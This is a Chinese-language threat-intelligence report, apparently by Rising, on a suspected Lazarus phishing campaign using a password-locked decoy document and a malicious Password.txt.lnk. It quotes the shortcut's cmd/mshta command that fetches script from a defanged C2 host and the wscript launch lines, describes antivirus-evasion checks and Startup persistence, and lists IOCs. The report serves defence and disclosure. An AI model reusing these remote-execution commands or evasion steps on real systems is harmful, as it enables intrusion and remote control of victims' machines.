概述
瑞星威胁情报于2021年10月12日捕获到一起疑似威胁组织Lazarus发起的攻击事件,攻击者可能利用钓鱼邮件等方式向目标投递名为New Profits Distributions_MATT.zip压缩包,在New Profits Distributions_MATT.zip压缩包内有两个文件:New Profits Distributions.docx和Password.txt.lnk。因为文档New Profits Distributions.docx被攻击者加密,所以需要用户点击Password.txt.lnk获取密码进行解密操作。又因为Password.txt.lnk快捷方式文件指向的目标为一段恶意JS代码,所以用户获取密码的同时也会被该JS代码所释放的恶意程序远程控制。
此次攻击手法和之前被爆出的Lazarus组织攻击手法类似,但是此次捕获的样本New Profits Distributions_MATT.zip内的加密诱饵文档New Profits Distributions.docx和今年5月采集的和Lazarus组织相关的攻击样本New Profits Distributions.zip中使用的加密诱饵文档一模一样,文档解密密码同是profits。变化的是压缩包内另一个负责执行恶意操作的Password.txt.lnk,该文件首次采集日期2021-10-12。比较意外的是此次攻击事件样本New Profits Distributions_MATT.zip中Password.txt.lnk指向的密码为bonus2021,而此密码并不能成功解密诱饵文档New Profits Distributions.docx。该密码bonus2021是瑞星早期所报道过的关于Lazarus事件中样本(MD5:60214745027C7EFA7CC920D43D9C254A)New Bonus Announcemnet.zip中诱饵文档所使用的密码,同时指向该密码的链接也是一模一样。虽说张冠李戴,但不影响攻击进行。此次事件仍可能和Lazarus威胁组织相关。
Lazarus Group是一个自2007年就开始对目标进行网络攻击的威胁组织,该组织又被称为Group 77、Hastati Group、Hidden Cobra、APT-C-26、T-APT-15、Zinc和Nickel Academy等,是现今最活跃的威胁组织之一。Lazarus Group来自朝鲜,具有国家背景。其除了擅长信息盗取,间谍活动,还会蓄意破坏获取经济利益,攻击的国家包括中国,德国,澳大利亚,日本等,涉及的领域有航空航天、政府、医疗、金融和媒体等。
ATT&CK矩阵
| 战术 | 技术 | 具体行为 |
|---|---|---|
| 初始访问 | 网络钓鱼 | 推测攻击行动以网络钓鱼为起始 |
| 执行 | 命令和脚本解释器 | 使用cmd命令执行js脚本 |
| 执行 | 用户执行 | 诱使用户点击恶意lnk文件 |
| 持久化 | 启动或登录自动执行 | Startup自启动目录中被放入了要执行js脚本的UserAssist.lnk |
| 权限提升 | 启动或登录自动执行 | Startup自启动目录中被放入了要执行js脚本的UserAssist.lnk |
| 防御规避 | 去混淆或解密文件和信息 | base64解密被加密的数据 |
| 防御规避 | 选择性攻击 | 排除安装了特定杀软的机器 |
| 防御规避 | 伪装 | 将lnk伪装成txt文档 |
| 防御规避 | 混淆过的文件或信息 | 含有base64加密数据 |
| 环境发现 | 收集进程信息 | 收集目标机器上进程信息 |
| 指挥与控制 | 应用层协议 | 使用HTTP/HTTPS进行指挥和控制 |
攻击事件
这起攻击事件投递的诱饵文档内容讲述了创业时盈亏问题。诱饵文档内提到该内容来自美国明尼苏达州就业和经济发展部小企业援助办公室提供的明尼苏达州创业指南摘录。同时发现,来自美国明尼苏达州的律师事务所BK Law Group官网上也有和诱饵文档同样内容的文章(官方链接:https://bk-lawgroup.com/blog/distribution-of-profits-and-losses)。猜测此次攻击目标可能和美国明尼苏达州相关。
攻击流程
样本分析
New Profits Distributions_MATT.zip分析
| 字段 | 内容 |
|---|---|
| 名称 | New Profits Distributions_MATT.zip |
| MD5 | BED99A09A68EB8F8B53D2A9D0CCC085A |
| 文件大小 | 21.44 KB (21950 bytes) |
| 文件类型 | ZIP |
| 首次采集时间 | 2021-10-12 |
攻击者利用钓鱼邮件等方式向目标投递名为New Profits Distributions_MATT.zip压缩包,在New Profits Distributions_MATT.zip压缩包内有两个文件:New Profits Distributions.docx和Password.txt.lnk。
New Profits Distributions.docx分析
| 字段 | 内容 |
|---|---|
| 名称 | New Profits Distributions.docx |
| MD5 | DEC25C57BDC8C945BA975D0F693243CB |
| 文件大小 | 24.50 KB (25088 bytes) |
| 文件类型 | DOCX |
| 首次采集时间 | 2021-05-07 |
当用户打开New Profits Distributions.docx文档,会被提示输入密码。用户可能就会点击Password.txt.lnk去找寻这个文档的密码。
Password.txt.lnk分析
| 字段 | 内容 |
|---|---|
| 名称 | Password.txt.lnk |
| MD5 | C44D866ADF8C6845B7DDA742C59C6B59 |
| 文件大小 | 2.27 KB (2324 bytes) |
| 文件类型 | Windows shortcut |
| 首次采集时间 | 2021-10-12 |
Password.txt.lnk快捷方式所指向的目标为:C:\Windows\System32\cmd.exe /c start /b mshta hxxps://www[.]onlinedocpage[.]org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4=,该快捷方式的主要目的是调用mshta.exe远程执行脚本代码。以下是脚本代码分析。
解密得到password.txt的链接并打开,password.txt的链接地址为:hxxps[:]//drive[.]google[.]com/file/d/1trBRwq10DsOK1bxUdYkcgqs7wpZYrJlR/view,用户访问该链接读取password.txt文档内容,该内容为bonus2021。
因出现张冠李戴的错误,bonus2021密码并不够成功解密New Profits Distributions.docx文档,诱饵文档正确密码是profits。
在%temp%目录下释放名为mkwvv.js的脚本文件。mkwvv.js脚本的主要作用是和www[.]onlinedocpage[.]org进行通信:上传和下发数据。
创建UserAssist.lnk的快捷方式文件并设置为开机自启:遍历系统进程,判断是否含有名为bdagent 、epsecurityservice、ccsvchst 、nortonsecurity、kwsprot和ekrn的进程,这些进程分别和BitDefender、Symantec(赛门铁克)、金山毒霸和ESET安全软件相关。如果没有找到,便Windows的startup自启动目录下释放名为UserAssist.lnk的快捷方式文件。
设置mkwvv.js脚本的执行方式:遍历进程,判断是否存在名为kwsprot(与金山毒霸安全软件相关)或npprot(与Net Protector Antivirus安全软件相关)的进程,如果存在,则利用cscript执行mkwvv.js脚本,不存在则利用wscript执行mkwvv.js脚本。之后执行mkwvv.js脚本
通过cmd命令执行mkwvv.js脚本,传递给mkwvv.js脚本的参数有两种组合,第一种是www[.]onlinedocpage[.]org/ 1第二种是www[.]onlinedocpage[.]org/ 2。
CMD.Exe /c start /b wscript "C:\Users\admin\AppData\Local\Temp\mkwvv.js" www[.]onlinedocpage[.]org/ 1 & start /b wscript "C:\Users\admin\AppData\Local\Temp\mkwvv.js" www[.]onlinedocpage[.]org/ 2。 UserAssist.lnk分析
| 字段 | 内容 |
|---|---|
| 名称 | UserAssist.lnk |
| MD5 | 791E527A2082E6207D1AC9B9B4550FDF |
| 文件大小 | 708.00 B (708 bytes) |
| 文件类型 | Windows shortcut |
| 首次采集时间 | 2021-10-12 |
该快捷方式文件的作用是利用mshta.exe执行来自短链接hxxps[:]//bit[.]ly/3oUMAZ7(实际链接hxxps[:]//www[.]onlinedocpage[.]org/sNMrUsSs7KdzaPqHi7g8lOL/6QEFrel2WwzIvO2/TEI=)的JS脚本代码,以下是关于所要执行的JS代码的详细分析。
在%temp%目录下释放名为wqpgk.js的脚本文件。wqpgk.js脚本和上述mkwvv.js脚本一模一样,并且都是与www[.]onlinedocpage[.]org通信。
设置wqpgk.js脚本执行方式:遍历进程,判断是否存在名为kwsprot(与金山毒霸安全软件相关)或npprot(与Net Protector Antivirus安全软件相关)的进程,如果存在,则利用cscript执行wqpgk.js脚本,不存在则利用wscript执行wqpgk.js脚本。
通过命令执行wqpgk.js脚本,传递给wqpgk.js脚本的参数有两种组合,第一种是www[.]onlinedocpage[.]org/1,第二种是www[.]onlinedocpage[.]org/2。
CMD.Exe /c start /b wscript "C:\Users\admin\AppData\Local\Temp\ wqpgk.js " www[.]onlinedocpage[.]org/ 1 & start /b wscript "C:\Users\admin\AppData\Local\Temp\ wqpgk.js " www[.]onlinedocpage[.]org/ 2mkwvv.js或wqpgk.js文件分析
| 字段 | 内容 |
|---|---|
| 名称 | mkwvv.js或wqpgk.js |
| MD5 | 0465F48D3E05AB31C5225B0C5E3E2368 |
| 文件大小 | 2.58 KB (2640 bytes) |
| 文件类型 | JavaScript |
| 首次采集时间 | 2021-10-12 |
该脚本主要操作是持续等待攻击方下发JS代码并执行,同时每隔15秒便向http:// www[.]onlinedocpage[.]org发送数据。发送的字符串组成方式为:a.[随机8个数字字符][2 / 1]1([2/1]:由脚本的参数2决定,如果参数2为2则是2,参数2为1则是1)
关联分析
瑞星在今年的早些时候也捕获了几起与Lazarus威胁组织相关的攻击事件,事件中使用的攻击手法类似,诱饵文档全文内容也都能在网上找到。例如这起攻击事件中使用的诱饵文档内容主要是关于创建员工奖金和激励计划。通过溯源得知该文章从加拿大MaRS网站上摘抄得来。在这起攻击事件中,攻击者利用钓鱼邮件等方式向目标投递名为New Bonus Announcemnet.zip压缩包,在New Bonus Announcemnet.zip压缩包内有两个文件:New Bonus Announcemnet.docx和Password.txt.lnk。因为文档New Bonus Announcemnet.docx被攻击者加密,所以需要用户点击Password.txt.lnk获取密码进行解密操作。又因为Password.txt.lnk快捷方式文件指向的目标为一段恶意JS代码,所以用户获取密码的同时也会被该JS代码所释放的恶意程序远程控制。
这些事件中,攻击者所使用的攻击手法高度一致,只是用于通信的C2地址不一样,用于实现C2通信的JS代码是一样的。如果攻击者对目标攻击成功,那么攻击者便可以在目标的电脑上执行任意代码。
总结
APT攻击有着针对性强、组织严密、持续时间长、高隐蔽性和间接攻击的显著特征,针对的目标都是具有重大信息资产,如国家军事、情报、战略部门和影响国计民生的行业如金融、能源等,国内相关政府机构和企业单位务必要引起重视,加强防御措施。
预防措施
-
不打开可疑文件。
不打开未知来源的可疑的文件和邮件,防止社会工程学和钓鱼攻击。
-
部署网络安全态势感知、预警系统等网关安全产品。
网关安全产品可利用威胁情报追溯威胁行为轨迹,帮助用户进行威胁行为分析、定位威胁源和目的,追溯攻击的手段和路径,从源头解决网络威胁,最大范围内发现被攻击的节点,帮助企业更快响应和处理。
-
安装有效的杀毒软件,拦截查杀恶意文档和木马病毒。
杀毒软件可拦截恶意文档和木马病毒,如果用户不小心下载了恶意文件,杀毒软件可拦截查杀,阻止病毒运行,保护用户的终端安全。
瑞星ESM目前已经可以检出此次攻击事件的相关样本
-
及时修补系统补丁和重要软件的补丁。
沦陷信标(IOC)
-
MD5
BED99A09A68EB8F8B53D2A9D0CCC085A DEC25C57BDC8C945BA975D0F693243CB C44D866ADF8C6845B7DDA742C59C6B59 791E527A2082E6207D1AC9B9B4550FDF 0465F48D3E05AB31C5225B0C5E3E2368 -
URL
hxxps://www[.]onlinedocpage[.]org/FcsDjkkPVjEsM6htE+uWxoDY7HoSX64xIHgNAoq6SF4= hxxps://drive.google.com/file/d/1trBRwq10DsOK1bxUdYkcgqs7wpZYrJlR/view hxxps://www[.]onlinedocpage[.]org